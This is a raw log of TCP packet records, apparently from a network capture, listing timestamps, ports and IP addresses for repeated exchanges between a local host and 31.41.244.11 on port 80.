Dec 18, 2024 13:38:36.316513062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.317518950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.317572117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.317682028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.317732096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.319008112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.319062948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.319304943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.319360018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.320311069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.320324898 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.320369959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.321516991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.321573019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.321604967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.321669102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.322241068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.322293997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.322350979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.322396994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.323170900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.323226929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.323252916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.323304892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.324168921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.324292898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.324299097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.324350119 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.324917078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.324930906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.324971914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.325601101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.325645924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.325651884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.325690985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.326925039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.326936960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.326999903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.327414036 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.327466965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.327575922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.327624083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.328406096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.328531981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.328587055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.329416037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.329471111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.329557896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.329632044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.330435991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.330471992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.330488920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.330516100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.331513882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.331571102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.331608057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.331655979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.332848072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.333067894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.333123922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.333759069 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.333813906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.346874952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.346976995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.346981049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.347054005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.347086906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.347119093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.347258091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.347733021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.348155022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.348206043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.348289967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.348336935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.349157095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.349214077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.349276066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.349322081 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.351531982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.351557016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.351568937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.351581097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.351633072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.351669073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.352231979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.352299929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.352358103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.353135109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.353189945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.479677916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.479768991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.479798079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.479872942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.480263948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.480387926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.480395079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.480428934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.481363058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.481443882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.481482029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.481556892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.482438087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.482551098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.482594013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.483325005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.483366966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.483473063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.483515024 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.484379053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.484544992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.484595060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.485450029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.485614061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.485663891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.486726046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.486773968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.486845970 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.486884117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.488111019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.488158941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.488255978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.488372087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.489094973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.489155054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.489191055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.489237070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.490000010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.490112066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.490120888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.490247011 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.490791082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.490845919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.490914106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.490957022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.491859913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.492063046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.492111921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.493091106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.493153095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.493257046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.493354082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.493947983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.493997097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.494105101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.494155884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.495099068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.495112896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.495214939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.496078014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.496131897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.496174097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.496222973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.497210979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.497267008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.497277975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.497313976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.498272896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.498322964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.498404026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.498459101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.499361992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.499412060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.499413013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.499460936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.500467062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.500569105 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.500601053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.500616074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.501643896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.501696110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.501791000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.501857996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.502624035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.502686977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.502753019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.502816916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.503568888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.503634930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.503736019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.503784895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.504663944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.504723072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.504827023 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.504879951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.505743027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.505800009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.505847931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.505922079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.506851912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.506897926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.506961107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.507040977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.507992983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.508040905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.508043051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.508085012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.509212971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.509267092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.509304047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.509397030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.510438919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.510493994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.510549068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.510600090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.511740923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.511795998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.511851072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.511905909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.512960911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.512974024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.513017893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.513037920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.514038086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.514087915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.514094114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.514132977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.514883995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.514895916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.514935970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.514959097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.515480995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.515533924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.515583038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.515681982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.516400099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.516412973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.516453028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.516472101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.517311096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.517391920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.517443895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.517503977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.518395901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.518503904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.518552065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.519395113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.519454002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.519510984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.519558907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.520530939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.520580053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.520617008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.520659924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.521630049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.521681070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.521689892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.521728039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.522663116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.522675991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.522759914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.523650885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.523700953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.523758888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.523806095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.524795055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.524856091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.525006056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.525487900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.525779963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.525827885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.525913954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.525963068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.526937962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.526951075 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.526988029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.527906895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.527957916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.537928104 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.538042068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.538139105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.538238049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.538254976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.538436890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.538438082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.539402008 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.539506912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.539510012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.539562941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.540288925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.540328026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.540353060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.540435076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.541380882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.541402102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.541527033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.541527033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.542361021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.542418957 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.542522907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.542572975 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.543463945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.543519974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.543555021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.543600082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.544588089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.544642925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.672018051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.672060013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.672168970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.672540903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.672617912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.672631025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.672689915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.673492908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.673558950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.673712015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.673763037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.674572945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.674623966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.674921989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.674972057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.674977064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.675030947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.675990105 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.676039934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.676078081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.676132917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.676954985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.677005053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.677074909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.677124023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.678280115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.678337097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.678411961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.678462982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.679688931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.679740906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.679742098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.679786921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.680557013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.680569887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.680613041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.681233883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.681288004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.681355000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.681406975 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.682281971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.682333946 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:36.682410955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:36.682460070 CET	49715	80	192.168.2.8	31.41.244.11
